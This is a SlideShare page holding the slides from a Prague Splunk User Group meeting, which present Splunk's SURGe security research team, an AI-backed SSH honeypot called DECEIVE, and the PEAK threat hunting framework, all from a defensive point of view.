SlideShare a Scribd company logo

PSUG 7 - 2025-06-03 - David Bianco on Splunk SURGe

Tomas Moser, profile picture
Tomas Moser

Meet David Bianco, Staff Strategist with Splunk’s elite SURGe team, live in Prague. Get ready for an engaging deep dive into the cutting edge of cybersecurity—straight from the experts driving Splunk’s global security research.

Data & Analytics
Related topics:
Threat Hunting
1 of 63
Downloaded 12 times
1
2
3
4
Most read
5
6
Most read
7
8
9
10
Most read
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
© 2023 SPLUNK INC. Prague Splunk User Group #7 3/6/2025 With David Bianco on Splunk SURGe Tomáš Moser Ingrid Němečková Michał Skorczewski Radek Filip
© 2023 SPLUNK INC. 16:30 - 17:00 (30 min) Registration 17:00 - 17:10 (10 min) Intro 17:10 - 17:40 (30 min) Part 1: SURGe Team 17:40 - 18:10 (30 min) Part 2: DECEIVE Project 18:10- 18:20 (10 min) Coffee Break 18:20 - 18:50 (30 min) Part 3: PEAK Threat Hunting Framework 18:50 - 19:00 (30 min) Wrap-Up and Q&A Agenda
© 2023 SPLUNK INC. Splunk User Group Community From Splunkers To Splunkers ✓ No sales ✓ No marketing ✓ It’s about YOU! ✓ Ask!
© 2023 SPLUNK INC. Who Are We? Tomáš Moser Sr. Solutions Engineer - GSS, Splunk tommoser@cisco.com Technical Support Engineer, Splunk inemecko@cisco.com Ingrid Nemečková Splunk Consultant, ALEF NULA radek.filip@alef.com Radek Filip Michał Skórczewski Sr. Solutions Engineer, Splunk mskorcze@cisco.com
© 2023 SPLUNK INC. David J. Bianco Staff Security Strategist, Splunk SURGE Passionate about improving security for everyone SANS certified instructor | Creator of Pyramid of Pain and Hunting Maturity Model | Lead author of PEAK threat hunting framework | … @DavidJBianco.bsky.social (Bluesky) DavidJBianco@infosec.exchange (Mastodon)
© 2025 SPLUNK LLC Part 1: SURGe Team
© 2025 SPLUNK LLC Splunk Users' Group Meeting David J. Bianco Staff Security Strategist SURGe by Splunk dabianco@cisco.com @DavidJBianco.bsky.social @DavidJBianco@infosec.exchange
Forward- looking statements © 2025 SPLUNK LLC This presentation may contain forward-looking statements that are subject to the safe harbors created under the Securities Act of 1933, as amended, and the Securities Exchange Act of 1934, as amended. All statements other than statements of historical facts are statements that could be deemed forward-looking statements. These statements are based on current expectations, estimates, forecasts, and projections about the industries in which we operate and the beliefs and assumptions of our management based on the information currently available to us. Words such as “expects,” “anticipates,” “targets,” “goals,” “projects,” “intends,” “plans,” “believes,” “momentum,” “seeks,” “estimates,” “continues,” “endeavors,” “strives,” “may,” variations of such words, and similar expressions are intended to identify such forward-looking statements. In addition, any statements that refer to (1) our goals, commitments, and programs; (2) our business plans, initiatives, and objectives; and (3) our assumptions and expectations, including our expectations regarding our financial performance, products, technology, strategy, customers, markets, acquisitions and investments are forward-looking statements. These forward-looking statements are not guarantees of future performance and involve significant risks, uncertainties and other factors that may cause our actual results, performance or achievements to be materially different from results, performance or achievements expressed or implied by the forward-looking statements contained in this presentation. Readers are cautioned that these forward-looking statements are only predictions and are subject to risks, uncertainties, and assumptions that are difficult to predict, including those identified in the “Risk Factors” section of Cisco’s most recent report on Form 10-Q filed on February 20, 2024 and its most recent report on Form 10-K filed on September 7, 2023, as well as the “Risk Factors” section of Splunk’s most recent report on Form 10-Q filed with the SEC on November 28, 2023. The forward-looking statements made in this presentation are made as of the time and date of this presentation. If reviewed after the initial presentation, even if made available by Cisco or Splunk, on Cisco or Splunk’s website or otherwise, it may not contain current or accurate information. Cisco and Splunk undertake no obligation to revise or update any forward-looking statements for any reason, except as required by law. In addition, any information about new products, features, functionality or our roadmap outlines our general product direction and is subject to change at any time without notice. It is for informational purposes only and shall not be incorporated into any contract or other commitment or be relied upon in making a purchasing decision. We undertake no commitment, promise or obligation either to develop the features or functionalities described, in beta or in preview (used interchangeably), or to include any such feature or functionality in a future release. The development, release, and timing of any features or functionality described for our products remains at our sole discretion. Splunk, Splunk> and Turn Data Into Doing are trademarks and registered trademarks of Splunk LLC in the United States and other countries. All other brand names, product names or trademarks belong to their respective owners. © 2025 Splunk LLC. All rights reserved.
© 2025 SPLUNK LLC About SURGe
© 2025 SPLUNK LLC © 2025 SPLUNK LLC Is a global team of security experts dedicated to enhancing cybersecurity through relevant strategic cybersecurity research and by providing valuable insights into the current state and evolution of cybersecurity threats. Take advantage of SURGe expertise and knowledge sharing to elevate your security operations and navigate high-profile events with confidence.
© 2025 SPLUNK LLC Expertise to help solve security problems Security Research Practical solutions to help understand, anticipate and respond to threats Cybersecurity Insights Proactively fortify your defenses and stay ahead of threats Security Outreach Enable security teams with hands on content that enhances capabilities
© 2025 SPLUNK LLC Meet the team
© 2025 SPLUNK LLC > David Bianco Staff Security Strategist, SURGe ● 20+ years of experience in incident detection & response, threat hunting, CTI, and other Blue-team topics ● SANS Certified Instructor ● Creator of the Pyramid of Pain & Hunting Maturity Model ● Lead author of PEAK ● Terrible at introducing himself
© 2025 SPLUNK LLC Published Research
© 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response.
© 2025 SPLUNK LLC Macro-ATT&CK Series Analyzing ATT&CK-mapped Threat Reporting to drive planning decisions in the SOC
© 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. Evaluating CA Trustworthiness Internet security is built on TLS, which anchors its trust on Root CAs. How do we know they are all worthy of our trust?
© 2025 SPLUNK LLC AI vs. Human-crafted Spear Phishing Old School vs. New School Will chat-based AI-assistants provide more utility to attackers, or defenders?
© 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. Chrome Browser Extension Analysis Examining extensions you might use regularly, highlighting potential risks and best practices.
© 2025 SPLUNK LLC Threat Hunting Essential Tasks and Resources What are the essential tasks and resources for Threat Hunters?
© 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. The Intersection of Security and Observability Understanding Observability tools to help blue teams
© 2025 SPLUNK LLC LLM Lifeguard: Safeguarding LLMs with Splunk and OWASP Top 10 A focused approach to securing Large Language Models
© 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. Vulnerability Prioritization A case study of recent large-scale security incidents to help inform vulnerability management strategy.
© 2025 SPLUNK LLC Gen-AI for the Blue Team Practical guidance about how to match security needs with LLM strengths when evaluating potential AI solutions for cybersecurity defense.
© 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. DECEIVE A high-interaction, low-effort honeypot system that uses AI to simulate a realistic system, complete with data, that an attacker can interact with.
© 2025 SPLUNK LLC Autonomous Adversaries: Are Blue Teams ready for Cyberattacks to go Agentic? Evaluating attacker technique use, vs. the measured ability of Language Models to accurately reproduce them – in the context of the modern, ‘agentic’ automation.
© 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. Defending at Machine-Speed: Accelerated Threat Hunting with Open Weight LLM Models Integrating an open weight LM for threat hunting PowerShell scripts can speed up initial event classification by 99%, a 250x speed increase.
© 2025 SPLUNK LLC AI for Vulnerability Investigation and Prioritisation SO many vulnerabilities, so little time! How does one understand and respond to all these new CVEs?
© 2025 SPLUNK LLC Current Projects
© 2025 SPLUNK LLC Post-logon Behavioural Fingerprinting and Detection Creating user behavior fingerprints in order to detect malicious logons as quickly as possible.
© 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. PEAK Threat Hunter's Cookbook A structured approach to closing the gap between theory and practice in Threat Hunting. Teaching analysts to cook – with Splunk!
© 2025 SPLUNK LLC Cybersecurity Insights
© 2025 SPLUNK LLC The PEAK Threat Hunting Framework PEAK builds on existing frameworks (Sqrrl, TaHiTi) and helps you quickly establish repeatable, efficient hunting operations: ● Hypothesis-driven, Baseline, and Machine Learning/AI hunt procedures ● Standards for hunt documentation ● Guidelines for creating automated detection ● Metrics that highlight the impact of hunting For more on PEAK, download the official framework documentation at splk.it/PEAK-Framework
© 2025 SPLUNK LLC Bluenomicon: The Network Defender’s Compendium Personal essays from cybersecurity luminaries Download your copy at splk.it/bluenomicon
© 2025 SPLUNK LLC Part 2: Deceive Project
Hi Fidelity != Hi Effort Meet DECEIVE, the AI-backed SSH Honeypot David J. Bianco Staff Security Strategist @DavidJBianco@infosec.exchange @DavidJBianco.bsky.social June 2025
© 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential About Me • 20+ years of experience in incident detection & response, threat hunting, CTI, and other Blue-team topics • SANS Certified Instructor • Creator of the Pyramid of Pain & Lead author of the PEAK Threat Hunting Framework • Terrible at introducing himself
© 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Why I started writing DECEIVE
© 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential The problem I wanted to solve Deception is a balancing act between realism and effort The more realistic it is, the more time you must put into it to set it up Plus, real systems are vulnerable to exploitation and misuse, which can be a barrier to adoption (just ask your lawyers)
© 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential How does DECEIVE address the problems? DECEIVE leverages a modular AI backend to provide all the “realism” with users, processes, and data. Given a short, simple prompt, it can simulate a variety of different SSH-accessible systems It looks real, but there’s no actual system for threat actors to take advantage of You are a video game developer's system. Include realistic video game source and asset files. You are a Cisco router running IOS XE 17.17. You are a SunOS 4.1 workstation.
© 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential DECEIVE Demo!
© 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Sample log: User input pwd /home/guest guest@prod-dev01:~ $
© 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Sample log: Session Evaluation
© 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential DECEIVE Development Me: a Python programmer with just a bit of prior LLM coding experience. From idea to first working demo: three days. • Half of that was getting the SSH code to work right. With additional enhancements courtesy of GitHub Copilot.
© 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Weaknesses and Drawbacks Every session is a new system. No terminal interaction. Certain commands (e.g., vi) don’t work. You cannot move data in or out of the honeypot. Payloads can’t be downloaded. Timing depends on the LLM response time, which can be slow.
© 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Future Plans Can I make it more realistic? Can I improve emulation of non-Linuxy things? Automated honeynet deployment? What about other protocols?
© 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential How to get started with DECEIVE Source code is available on GitHub https://github.com/splunk/DECEIVE
Hi Fidelity != Hi Effort Meet DECEIVE, the AI-backed SSH Honeypot David J. Bianco Staff Security Strategist @DavidJBianco@infosec.exchange @DavidJBianco.bsky.social June 2025
© 2025 SPLUNK LLC Part 3: PEAK Framework
© 2025 SPLUNK LLC The PEAK Threat Hunting Framework
© 2025 SPLUNK LLC © 2025 SPLUNK LLC The Sqrrl Threat Hunting Loop (2015) Everyone wanted to hunt, but few agreed on what hunting was or how to do it Sqrrl’s threat hunting loop was the first published “how to” for threat hunting Focused on hypothesis-driven hunting and detection improvement Credit: Sqrrl
© 2025 SPLUNK LLC Prepare, Execute, and Act with Knowledge Hypothesis-driven Baseline (anomaly) Model-Assisted Threat Hunting (MATH) With detailed processes Hunt documentation Gaps & risks Stakeholder comms Detections Not only incidents Hierarchy of detection outputs provides additional options Helps teams target specific detections for improvement Beyond just rules Communicate the impact of hunting Show value across your entire security program Better storytelling PEAK incorporates lessons and experience from the last ten years More hunt types Defined deliverables Detection Guidance Effective metrics
© 2025 SPLUNK LLC © 2025 SPLUNK LLC Complete process diagrams for new hunt types Hypothesis-Based Baseline Model-Assisted
© 2025 SPLUNK LLC © 2025 SPLUNK LLC Defined Hunt Deliverables
© 2025 SPLUNK LLC © 2025 SPLUNK LLC Detection Engineering Guidance Dashboards & Visualizations Present the distilled info to humans and let them decide. Some automation, but still requires manual review on a regular basis. Reports Saved searches with little or no pre-processing. Human must spend significant effort to extract meaning. Analytics in Code Splunk® MLTK, Python, or other algorithmic detections. Automated, but more complex. May take significant resources. More management and upkeep necessary. 4 Signatures & Rules Splunk® Enterprise Security, Suricata IDS, etc. Automated. Simple and easy to manage. 1 3 2
© 2025 SPLUNK LLC © 2025 SPLUNK LLC Metrics to tell the story of hunting impact 5 T e c h n i q u e s H u n t e d M a p h u n t e d b e h a v i o r s t o A T T & C K , K i l l C h a i n , P y r a m i d o f P a i n , e t c . W h e r e a r e y o u h u n t i n g ? W h e r e s h o u l d y o u h u n t n e x t ? 4 V u l n e r a b i l i t i e s & M i s c o n fi g u r a t i o n s U p d a t e s a n d c o r r e c t i o n s t o s y s t e m s a n d s e r v i c e s a s a r e s u l t o f h u n t fi n d i n g s 3 G a p s I d e n t i fi e d / G a p s C l o s e d V i s i b i l i t y , t o o l s , a c c e s s , e t c . t h a t y o u d i d n ’ t h a v e a n d o n e s t h a t y o u l a t e r a c q u i r e d D e t e c t i o n s C r e a t e d / U p d a t e d N u m b e r o f n e w o r i m p r o v e d d e t e c t i o n s , b y t y p e , a s a r e s u l t o f h u n t i n g 2 1 I n c i d e n t s O p e n e d N u m b e r o f i n c i d e n t s c r e a t e d d u r i n g h u n t s , b u t a l s o o p e n e d l a t e r a s a r e s u l t o f d e t e c t i o n s c r e a t e d f r o m h u n t i n g
© 2025 SPLUNK LLC © 2025 SPLUNK LLC Reach the PEAK! Download the PEAK eBook Join the Community Slack #peak-threat-hunting
© 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. PEAK Threat Hunter's Cookbook A structured approach to closing the gap between theory and practice in Threat Hunting. Teaching analysts to cook – with Splunk! COMING AUGUST 2025
© 2025 SPLUNK LLC The PEAK Threat Hunting Workshop ● Understand the PEAK Framework ● Master Three Types of Threat Hunts ● Hands-on Experience
© 2025 SPLUNK LLC Where you can find us How to stay informed ● Stay up to date on all things SURGe with our Newsletter splunk.com/surge
© 2025 SPLUNK LLC Thank you
© 2023 SPLUNK INC. Wrap-Up ● Did you like it? ● Please fill in the post-event survey! ● Slides will be shared on SUG #7 event page and Slideshare! ● Talk to us :-) Slack Register and subscribe to #ug_prague channel Email tommoser@cisco.com inemecko@cisco.com mskorcze@cisco.com radek.filip@alef.com LinkedIn https://www.linkedin.com/groups/9544692/
© 2023 SPLUNK INC. See you next time

More Related Content

PDF
Splunk Leadership Forum Wien - 20.05.2025
Splunk
 
PDF
Power the SOC of the Future with scale, speed and choice - Splunk Public Sect...
Splunk EMEA
 
PDF
SFBA Splunk Usergroup meeting Nov 20, 2024
Becky Burwell
 
PDF
Splunk ES 8 mission controle data analytic
willmorekanan
 
PDF
March 2023 PNW User Group
Amanda Richardson
 
PDF
2022 09 March Splunk PNW User Group
Amanda Richardson
 
PDF
Splunk Solution overview testing versi 1
yulitasarahhh
 
PPTX
Splunk enterprise security_splunk_bengaluru_user_group_2020_10_03
NiketNilay
 
Splunk Leadership Forum Wien - 20.05.2025
Splunk
 
Power the SOC of the Future with scale, speed and choice - Splunk Public Sect...
Splunk EMEA
 
SFBA Splunk Usergroup meeting Nov 20, 2024
Becky Burwell
 
Splunk ES 8 mission controle data analytic
willmorekanan
 
March 2023 PNW User Group
Amanda Richardson
 
2022 09 March Splunk PNW User Group
Amanda Richardson
 
Splunk Solution overview testing versi 1
yulitasarahhh
 
Splunk enterprise security_splunk_bengaluru_user_group_2020_10_03
NiketNilay
 

Similar to PSUG 7 - 2025-06-03 - David Bianco on Splunk SURGe (20)

PDF
SplunkLive! Wien - Splunk für Security
Splunk
 
PDF
SplunkLive! Zürich - Splunk für Security
Splunk
 
PDF
Webinar: Neues zur Splunk App for Enterprise Security
Georg Knon
 
PPTX
Build a Security Portfolio That Strengthens Your Security Posture
Splunk
 
PDF
Mission Possible: Detect and Prevent CyberAttacks with Splunk and Palo Alto N...
Erin Sweeney
 
PDF
Mission possible splunk+paloaltonetworks_6_2015
Splunk
 
PDF
SplunkLive! München 2016 - Splunk für Security
Splunk
 
PPTX
Make Your SOC Work Smarter, Not Harder
Splunk
 
PPTX
Security crawl walk run presentation mckay v1 2017
Adam Tice
 
PPTX
SplunkLive! London 2017 - Build a Security Portfolio That Strengthens Your Se...
Splunk
 
PDF
Splunk bangalore user group 2020-06-01
NiketNilay
 
PDF
Building an Analytics Enables SOC
Splunk
 
PPTX
Splunk live nyc_2017_sec_buildinganalyticsdrivensoc
Rene Aguero
 
PDF
Splunk Discovery: Warsaw 2018 - Solve Your Security Challenges with Splunk En...
Splunk
 
PPTX
Splunk EMEA Webinar: Scoping infections and disrupting breaches
Splunk
 
PDF
Intro To Observability-March-2023.pdf
PremDomingo
 
PPTX
Splunk for Security Breakout Session
Splunk
 
PDF
Using Machine Learning and Analytics to Hunt for Security Threats - Webinar
Splunk
 
PPTX
Splunk Forum Frankfurt - 15th Nov 2017 - Building SOC with Splunk
Splunk
 
PPTX
Splunk Overview
Splunk
 
SplunkLive! Wien - Splunk für Security
Splunk
 
SplunkLive! Zürich - Splunk für Security
Splunk
 
Webinar: Neues zur Splunk App for Enterprise Security
Georg Knon
 
Build a Security Portfolio That Strengthens Your Security Posture
Splunk
 
Mission Possible: Detect and Prevent CyberAttacks with Splunk and Palo Alto N...
Erin Sweeney
 
Mission possible splunk+paloaltonetworks_6_2015
Splunk
 
SplunkLive! München 2016 - Splunk für Security
Splunk
 
Make Your SOC Work Smarter, Not Harder
Splunk
 
Security crawl walk run presentation mckay v1 2017
Adam Tice
 
SplunkLive! London 2017 - Build a Security Portfolio That Strengthens Your Se...
Splunk
 
Splunk bangalore user group 2020-06-01
NiketNilay
 
Building an Analytics Enables SOC
Splunk
 
Splunk live nyc_2017_sec_buildinganalyticsdrivensoc
Rene Aguero
 
Splunk Discovery: Warsaw 2018 - Solve Your Security Challenges with Splunk En...
Splunk
 
Splunk EMEA Webinar: Scoping infections and disrupting breaches
Splunk
 
Intro To Observability-March-2023.pdf
PremDomingo
 
Splunk for Security Breakout Session
Splunk
 
Using Machine Learning and Analytics to Hunt for Security Threats - Webinar
Splunk
 
Splunk Forum Frankfurt - 15th Nov 2017 - Building SOC with Splunk
Splunk
 
Splunk Overview
Splunk
 
Ad

More from Tomas Moser (6)

PDF
PSUG 6 - 2025-04-14 - Splunk Data Normalization, Detection Engineering, EdgeHub
Tomas Moser
 
PDF
PSUG 5 - 2025-01-20 - Splunk Observability And Digital Resilience
Tomas Moser
 
PDF
PSUG 4 - 2024-10-21 - Splunk & Škoda Auto
Tomas Moser
 
PDF
PSUG 3 - 2024-07-15 - Splunk & AI with Philipp Drieger
Tomas Moser
 
PDF
PSUG 2 - 2024-04-15: Proactive IT Monitoring & Dynamic Asset Management (Czech)
Tomas Moser
 
PDF
PSUG 1 - 2024-01-22 - Onboarding Best Practices
Tomas Moser
 
PSUG 6 - 2025-04-14 - Splunk Data Normalization, Detection Engineering, EdgeHub
Tomas Moser
 
PSUG 5 - 2025-01-20 - Splunk Observability And Digital Resilience
Tomas Moser
 
PSUG 4 - 2024-10-21 - Splunk & Škoda Auto
Tomas Moser
 
PSUG 3 - 2024-07-15 - Splunk & AI with Philipp Drieger
Tomas Moser
 
PSUG 2 - 2024-04-15: Proactive IT Monitoring & Dynamic Asset Management (Czech)
Tomas Moser
 
PSUG 1 - 2024-01-22 - Onboarding Best Practices
Tomas Moser
 
Ad

Recently uploaded (20)

PDF
Data Engineering Interview Questions & Answers Cloud Data Stacks (AWS, Azure,...
Mindbox Trainings
 
PPTX
STERILIZATION AND DISINFECTION-1.ppthhhbx
DivuuJain
 
PPTX
Qualitative Qantitative and Mixed Methods.pptx
AhmaduMohammed
 
PDF
How to run a consulting project- client discovery
P&CO
 
PDF
REAL ILLUMINATI AGENT IN KAMPALA UGANDA CALL ON+256765750853/0705037305
Real illuminati agent from Uganda Kampala call 0782561496/0756664682
 
PPTX
A Complete Guide to Streamlining Business Processes
Accentfuture
 
PDF
Microsoft Core Cloud Services powerpoint
KamelAbouSaleh1
 
PPTX
Acceptance and paychological effects of mandatory extra coach I classes.pptx
ZaheerAhmad228692
 
PPTX
(Ali Hamza) Roll No: (F24-BSCS-1103).pptx
fb7654821
 
PDF
Business Analytics and business intelligence.pdf
khalidisah4750
 
PPTX
Managing Community Partner Relationships
alexmderr
 
PPTX
CEE 2 REPORT G7.pptxbdbshjdgsgjgsjfiuhsd
hildogavino28
 
PPTX
Modelling in Business Intelligence , information system
anantyakhrisna1
 
PPTX
Topic 5 Presentation 5 Lesson 5 Corporate Fin
kevinluvr
 
PDF
Introduction to the R Programming Language
Suraj Patil
 
PDF
annual-report-2024-2025 original latest.
nityanema19
 
PDF
Lecture1 pattern recognition............
ZafriFarid
 
PDF
Transcultural that can help you someday.
jhongarin24
 
PDF
Introduction to Data Science and Data Analysis
Suraj Patil
 
PPTX
Microsoft-Fabric-Unifying-Analytics-for-the-Modern-Enterprise Solution.pptx
Mahesh Reddy
 
Data Engineering Interview Questions & Answers Cloud Data Stacks (AWS, Azure,...
Mindbox Trainings
 
STERILIZATION AND DISINFECTION-1.ppthhhbx
DivuuJain
 
Qualitative Qantitative and Mixed Methods.pptx
AhmaduMohammed
 
How to run a consulting project- client discovery
P&CO
 
REAL ILLUMINATI AGENT IN KAMPALA UGANDA CALL ON+256765750853/0705037305
Real illuminati agent from Uganda Kampala call 0782561496/0756664682
 
A Complete Guide to Streamlining Business Processes
Accentfuture
 
Microsoft Core Cloud Services powerpoint
KamelAbouSaleh1
 
Acceptance and paychological effects of mandatory extra coach I classes.pptx
ZaheerAhmad228692
 
(Ali Hamza) Roll No: (F24-BSCS-1103).pptx
fb7654821
 
Business Analytics and business intelligence.pdf
khalidisah4750
 
Managing Community Partner Relationships
alexmderr
 
CEE 2 REPORT G7.pptxbdbshjdgsgjgsjfiuhsd
hildogavino28
 
Modelling in Business Intelligence , information system
anantyakhrisna1
 
Topic 5 Presentation 5 Lesson 5 Corporate Fin
kevinluvr
 
Introduction to the R Programming Language
Suraj Patil
 
annual-report-2024-2025 original latest.
nityanema19
 
Lecture1 pattern recognition............
ZafriFarid
 
Transcultural that can help you someday.
jhongarin24
 
Introduction to Data Science and Data Analysis
Suraj Patil
 
Microsoft-Fabric-Unifying-Analytics-for-the-Modern-Enterprise Solution.pptx
Mahesh Reddy
 

PSUG 7 - 2025-06-03 - David Bianco on Splunk SURGe

  • 1. © 2023 SPLUNK INC. Prague Splunk User Group #7 3/6/2025 With David Bianco on Splunk SURGe Tomáš Moser Ingrid Němečková Michał Skorczewski Radek Filip
  • 2. © 2023 SPLUNK INC. 16:30 - 17:00 (30 min) Registration 17:00 - 17:10 (10 min) Intro 17:10 - 17:40 (30 min) Part 1: SURGe Team 17:40 - 18:10 (30 min) Part 2: DECEIVE Project 18:10- 18:20 (10 min) Coffee Break 18:20 - 18:50 (30 min) Part 3: PEAK Threat Hunting Framework 18:50 - 19:00 (30 min) Wrap-Up and Q&A Agenda
  • 3. © 2023 SPLUNK INC. Splunk User Group Community From Splunkers To Splunkers ✓ No sales ✓ No marketing ✓ It’s about YOU! ✓ Ask!
  • 4. © 2023 SPLUNK INC. Who Are We? Tomáš Moser Sr. Solutions Engineer - GSS, Splunk [email protected] Technical Support Engineer, Splunk [email protected] Ingrid Nemečková Splunk Consultant, ALEF NULA [email protected] Radek Filip Michał Skórczewski Sr. Solutions Engineer, Splunk [email protected]
  • 5. © 2023 SPLUNK INC. David J. Bianco Staff Security Strategist, Splunk SURGE Passionate about improving security for everyone SANS certified instructor | Creator of Pyramid of Pain and Hunting Maturity Model | Lead author of PEAK threat hunting framework | … @DavidJBianco.bsky.social (Bluesky) [email protected] (Mastodon)
  • 6. © 2025 SPLUNK LLC Part 1: SURGe Team
  • 7. © 2025 SPLUNK LLC Splunk Users' Group Meeting David J. Bianco Staff Security Strategist SURGe by Splunk [email protected] @DavidJBianco.bsky.social @[email protected]
  • 8. Forward- looking statements © 2025 SPLUNK LLC This presentation may contain forward-looking statements that are subject to the safe harbors created under the Securities Act of 1933, as amended, and the Securities Exchange Act of 1934, as amended. All statements other than statements of historical facts are statements that could be deemed forward-looking statements. These statements are based on current expectations, estimates, forecasts, and projections about the industries in which we operate and the beliefs and assumptions of our management based on the information currently available to us. Words such as “expects,” “anticipates,” “targets,” “goals,” “projects,” “intends,” “plans,” “believes,” “momentum,” “seeks,” “estimates,” “continues,” “endeavors,” “strives,” “may,” variations of such words, and similar expressions are intended to identify such forward-looking statements. In addition, any statements that refer to (1) our goals, commitments, and programs; (2) our business plans, initiatives, and objectives; and (3) our assumptions and expectations, including our expectations regarding our financial performance, products, technology, strategy, customers, markets, acquisitions and investments are forward-looking statements. These forward-looking statements are not guarantees of future performance and involve significant risks, uncertainties and other factors that may cause our actual results, performance or achievements to be materially different from results, performance or achievements expressed or implied by the forward-looking statements contained in this presentation. Readers are cautioned that these forward-looking statements are only predictions and are subject to risks, uncertainties, and assumptions that are difficult to predict, including those identified in the “Risk Factors” section of Cisco’s most recent report on Form 10-Q filed on February 20, 2024 and its most recent report on Form 10-K filed on September 7, 2023, as well as the “Risk Factors” section of Splunk’s most recent report on Form 10-Q filed with the SEC on November 28, 2023. The forward-looking statements made in this presentation are made as of the time and date of this presentation. If reviewed after the initial presentation, even if made available by Cisco or Splunk, on Cisco or Splunk’s website or otherwise, it may not contain current or accurate information. Cisco and Splunk undertake no obligation to revise or update any forward-looking statements for any reason, except as required by law. In addition, any information about new products, features, functionality or our roadmap outlines our general product direction and is subject to change at any time without notice. It is for informational purposes only and shall not be incorporated into any contract or other commitment or be relied upon in making a purchasing decision. We undertake no commitment, promise or obligation either to develop the features or functionalities described, in beta or in preview (used interchangeably), or to include any such feature or functionality in a future release. The development, release, and timing of any features or functionality described for our products remains at our sole discretion. Splunk, Splunk> and Turn Data Into Doing are trademarks and registered trademarks of Splunk LLC in the United States and other countries. All other brand names, product names or trademarks belong to their respective owners. © 2025 Splunk LLC. All rights reserved.
  • 9. © 2025 SPLUNK LLC About SURGe
  • 10. © 2025 SPLUNK LLC © 2025 SPLUNK LLC Is a global team of security experts dedicated to enhancing cybersecurity through relevant strategic cybersecurity research and by providing valuable insights into the current state and evolution of cybersecurity threats. Take advantage of SURGe expertise and knowledge sharing to elevate your security operations and navigate high-profile events with confidence.
  • 11. © 2025 SPLUNK LLC Expertise to help solve security problems Security Research Practical solutions to help understand, anticipate and respond to threats Cybersecurity Insights Proactively fortify your defenses and stay ahead of threats Security Outreach Enable security teams with hands on content that enhances capabilities
  • 12. © 2025 SPLUNK LLC Meet the team
  • 13. © 2025 SPLUNK LLC > David Bianco Staff Security Strategist, SURGe ● 20+ years of experience in incident detection & response, threat hunting, CTI, and other Blue-team topics ● SANS Certified Instructor ● Creator of the Pyramid of Pain & Hunting Maturity Model ● Lead author of PEAK ● Terrible at introducing himself
  • 14. © 2025 SPLUNK LLC Published Research
  • 15. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response.
  • 16. © 2025 SPLUNK LLC Macro-ATT&CK Series Analyzing ATT&CK-mapped Threat Reporting to drive planning decisions in the SOC
  • 17. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. Evaluating CA Trustworthiness Internet security is built on TLS, which anchors its trust on Root CAs. How do we know they are all worthy of our trust?
  • 18. © 2025 SPLUNK LLC AI vs. Human-crafted Spear Phishing Old School vs. New School Will chat-based AI-assistants provide more utility to attackers, or defenders?
  • 19. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. Chrome Browser Extension Analysis Examining extensions you might use regularly, highlighting potential risks and best practices.
  • 20. © 2025 SPLUNK LLC Threat Hunting Essential Tasks and Resources What are the essential tasks and resources for Threat Hunters?
  • 21. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. The Intersection of Security and Observability Understanding Observability tools to help blue teams
  • 22. © 2025 SPLUNK LLC LLM Lifeguard: Safeguarding LLMs with Splunk and OWASP Top 10 A focused approach to securing Large Language Models
  • 23. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. Vulnerability Prioritization A case study of recent large-scale security incidents to help inform vulnerability management strategy.
  • 24. © 2025 SPLUNK LLC Gen-AI for the Blue Team Practical guidance about how to match security needs with LLM strengths when evaluating potential AI solutions for cybersecurity defense.
  • 25. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. DECEIVE A high-interaction, low-effort honeypot system that uses AI to simulate a realistic system, complete with data, that an attacker can interact with.
  • 26. © 2025 SPLUNK LLC Autonomous Adversaries: Are Blue Teams ready for Cyberattacks to go Agentic? Evaluating attacker technique use, vs. the measured ability of Language Models to accurately reproduce them – in the context of the modern, ‘agentic’ automation.
  • 27. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. Defending at Machine-Speed: Accelerated Threat Hunting with Open Weight LLM Models Integrating an open weight LM for threat hunting PowerShell scripts can speed up initial event classification by 99%, a 250x speed increase.
  • 28. © 2025 SPLUNK LLC AI for Vulnerability Investigation and Prioritisation SO many vulnerabilities, so little time! How does one understand and respond to all these new CVEs?
  • 29. © 2025 SPLUNK LLC Current Projects
  • 30. © 2025 SPLUNK LLC Post-logon Behavioural Fingerprinting and Detection Creating user behavior fingerprints in order to detect malicious logons as quickly as possible.
  • 31. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. PEAK Threat Hunter's Cookbook A structured approach to closing the gap between theory and practice in Threat Hunting. Teaching analysts to cook – with Splunk!
  • 32. © 2025 SPLUNK LLC Cybersecurity Insights
